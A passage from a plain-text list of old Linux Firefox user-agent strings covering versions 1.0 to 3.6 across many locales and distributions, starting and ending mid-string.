en-US; rv:1.8.1.1) Gecko/20070224 Firefox/2.0.0.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.20) Gecko/20081217 Firefox(2.0.0.20)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.22pre) Gecko/20090327 Ubuntu/7.10 (gutsy) Firefox/2.0.0.22pre\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.22pre) Gecko/20090327 Ubuntu/8.04 (hardy) Firefox/2.0.0.22pre\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20061201 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20061201 Firefox/2.0.0.2 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070221 SUSE/2.0.0.2-6.1 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070225 Firefox/2.0.0.2 (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070226 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070314 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070317 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20061201 Firefox/2.0.0.1 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3pre) Gecko/20070307 Firefox/2.0.0.3pre (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 (Kubuntu)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070530 Fedora/2.0.0.4-1.fc7 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070531 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070531 Firefox/2.0.0.4 (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070602 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4pre) Gecko/20070509 Firefox/2.0.0.4pre (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070719 Firefox/2.0.0.5 (Debian-2.0.0.5-0etch1)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070725 Firefox/2.0.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070728 Firefox/2.0.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070804 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070807 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070831 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.7) Gecko/20070921 Firefox/2.0.0.7\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.7) Gecko/20070923 Firefox/2.0.0.7 (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20061201 Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Firefox/2.0.0.8 (Debian-2.0.0.8-1)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071008 FreeBSD/i386 Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071019 Fedora/2.0.0.8-1.fc7 Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071201 Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/1.5.0.9 (Debian-2.0.0.9-2)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071025 FreeBSD/i386 Firefox/2.0.0.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071103 Firefox/2.0.0.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071103 Firefox/2.0.0.9 (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071105 Fedora/2.0.0.9-1.fc7 Firefox/2.0.0.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071105 Firefox/2.0.0.9\nMozilla/5.0 (X11; U; Linux i686; en_US; rv:1.8.1b1) Gecko/20060813 Firefox/2.0b1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061001 Firefox/2.0b (Swiftfox)\nMozilla/5.0 (X11;U;Linux i686;en-US;rv:1.8.1) Gecko/2006101022 Firefox/2.0\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051008 Fedora/1.5-0.5.0.beta2 Firefox/1.4.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20060110 Debian/1.5.dfsg-4 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20060111 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20060118 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20060119 Debian/1.5.dfsg-4ubuntu3 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20060130 Ubuntu/1.5.dfsg-4ubuntu6 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20060806 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042513 Linux Mint/5 (Elyssa) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Linux Mint/6 (Felicia) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Linux Mint/7 (Gloria) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042708 Fedora/3.0.10-1.fc10 Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042812 Gentoo Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060308 Linux Mint/7 (Gloria) Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060310 Linux Mint/6 (Felicia) Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070610 Firefox/3.0.12\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070812 Linux Mint/5 (Elyssa) Firefox/3.0.12\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070818 Firefox/3.0.12\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12 FirePHP/0.3\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14 GTB5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090905 Fedora/3.0.14-1.fc10 Firefox/3.0.14\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009091010 Firefox/3.0.14 (Debian-3.0.14-1)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/20090916 Ubuntu/9.04 (jaunty) Firefox/3.0.14\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.17) Gecko/2010010604 Ubuntu/9.04 (jaunty) Firefox/3.0.17 FirePHP/0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.19) Gecko/2010072023 Firefox/3.0.6 (Debian-3.0.6-3)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.19) Gecko/2010091807 Firefox/3.0.6 (Debian-3.0.6-3)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1pre) Gecko/2008062222 Firefox/3.0.1pre (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008091816 Red Hat/3.0.2-3.el5 Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092000 Ubuntu/8.04 (hardy) Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/1.4.0 (hardy) Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1.6\nMozilla/5.0 (X11; U; Linux i686; en-us; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092318 Fedora/3.0.2-1.fc9 Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092418 CentOS/3.0.2-3.el5.centos Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092809 Gentoo Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008110715 ASPLinux/3.0.2-3.0.120asp Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008100320 Firefox/2.0.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3pre) Gecko/2008090713 Firefox/3.0.3pre (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.10 (intrepid) Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4pre) Gecko/2008101311 Firefox/3.0.4pre (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121622 Linux Mint/6 (Felicia) Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121718 Gentoo Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121914 Ubuntu/8.04 (hardy) Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2009011301 Gentoo Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-0.1 Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020410 Fedora/3.0.6-1.fc10 Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020410 Fedora/3.0.6-1.fc9 Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020518 Ubuntu/9.04 (jaunty) Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020616 Gentoo Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.04 (hardy) Firefox/3.0.6 FirePHP/0.2.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009022111 Gentoo Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009022714 Ubuntu/9.04 (jaunty) Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.7) Gecko/2009032018 Firefox/3.0.4 (Debian-3.0.6-1)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009040820 Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009041408 Red Hat/3.0.9-1.el5 Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009042113 Linux Mint/6 (Felicia) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 GTB5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Firefox/11.0\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Slackware/13.0 Firefox/3.5.2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2pre) Gecko/20090729 Ubuntu/9.04 (jaunty) Firefox/3.5.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090912 Gentoo Firefox/3.5.3 FirePHP/0.3\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090919 Firefox/3.5.3\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.4) Gecko/20091028 Ubuntu/9.10 (karmic) Firefox/3.5.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.6) Gecko/20100118 Gentoo Firefox/3.5.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100315 Ubuntu/9.10 (karmic) Firefox/3.5.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9 GTB7.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1b3) Gecko/20090407 Firefox/3.1b3\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1) Gecko/20090701 Ubuntu/9.04 (jaunty) Firefox/3.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.04 (jaunty) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10pre) Gecko/20100902 Ubuntu/9.10 (karmic) Firefox/3.6.1pre\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101114 Gentoo Firefox/3.6.12\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.14pre) Gecko/20110105 Firefox/3.6.14pre\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.15) Gecko/20110303 Ubuntu/10.04 (lucid) Firefox/3.6.15 FirePHP/0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.16) Gecko/20110323 Ubuntu/9.10 (karmic) Firefox/3.6.16 FirePHP/0.5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.16pre) Gecko/20110304 Ubuntu/10.10 (maverick) Firefox/3.6.15pre\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.1) Gecko/20100122 firefox/3.6.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.3\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100312 Ubuntu/9.04 (jaunty) Firefox/3.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100404 Ubuntu/10.04 (lucid) Firefox/3.6.3\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.4) Gecko/20100625 Gentoo Firefox/3.6.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.8) Gecko/20100727 Firefox/3.6.8\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.9) Gecko/20100827 Red Hat/3.6.9-2.el6 Firefox/3.6.9\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 FirePHP/0.4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Ubuntu/10.04 (lucid) Firefox/3.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100128 Gentoo Firefox/3.6\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20051215 Firefox/1.6a1 (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060117 Firefox/1.6a1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060217 Firefox/1.6a1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060814 Firefox/3.0a1\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b2) Gecko/2007121016 Firefox/3.0b2\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b3) Gecko/2008020513 Firefox/3.0b3\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b3pre) Gecko/2008010415 Firefox/3.0b\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b3pre) Gecko/2008020507 Firefox/3.0b3pre\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4) Gecko/2008031317 Firefox/3.0b4\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008021712 Firefox/3.0b4pre (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008021714 Firefox/3.0b4pre (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9pre) Gecko/2008040318 Firefox/3.0pre (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; en-ZW; rv:1.8.0.7) Gecko/20061018 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.6) Gecko/20070803 Firefox/2.0.0.6 (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.6) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.4) Gecko/2008111317 Linux Mint/5 (Elyssa) Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.0.11) Gecko/20070327 Ubuntu/dapper-security Firefox/1.5.0.11\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.0.7) Gecko/20060830 Firefox/1.5.0.7 (Debian-1.5.dfsg+1.5.0.7-1~bpo.1)\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) Gecko/20080213 Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.14) Gecko/20080419 Ubuntu/8.04 (hardy) Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.2) Gecko/20060601 Firefox/2.0.0.2 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.2) Gecko/20070225 Firefox/2.0.0.2 (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.10) Gecko/2009042513 Linux Mint/5 (Elyssa) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009060309 Linux Mint/5 (Elyssa) Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009060310 Ubuntu/8.10 (intrepid) Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc9 Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.14) Gecko/2009090216 Firefox/3.0.14\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6 GTB6\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.7) Gecko/20091222 SUSE/3.5.7-1.1.1 Firefox/3.5.7\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1 Firefox/3.5.9\nMozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.13) Gecko/20101206 Ubuntu/9.10 (karmic) Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux i686; eu; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-0.1.2 Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux i686; fa; rv:1.8.1.4) Gecko/20100527 Firefox/3.6.4\nMozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.13) Gecko/2009080315 Linux Mint/6 (Felicia) Firefox/3.0.13\nMozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\nMozilla/5.0 (X11; U; Linux i686; fr-be; rv:1.9.0.8) Gecko/2009073022 Ubuntu/9.04 (jaunty) Firefox/3.0.13\nMozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.7.10) Gecko/20050716 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.7.10) Gecko/20050925 Firefox/1.0.4 (Debian package 1.0.4-2sarge5)\nMozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\nMozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17\nMozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.8.1.6) Gecko/20080208 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12\nMozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.8) Gecko/20051111 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.0.5) Gecko/2008123017 Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5\nMozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.10) Gecko/20050721 Firefox/1.0.6 (Ubuntu package 1.0.6)\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.10) Gecko/20050925 Firefox/1.0.4 (Debian package 1.0.4-2sarge5)\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12) Gecko/20050922 Firefox/1.0.7 (Debian package 1.0.7-1)\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.8) Gecko/20050524 Fedora/1.0.4-4 Firefox/1.0.4\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10 pango-text\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.7) Gecko/20060921 Ubuntu/dapper-security Firefox/1.5.0.7\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.8) Gecko/20061213 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.12) Gecko/20080208 Fedora/2.0.0.12-1.fc8 Firefox/2.0.0.12\nMozilla/5.0 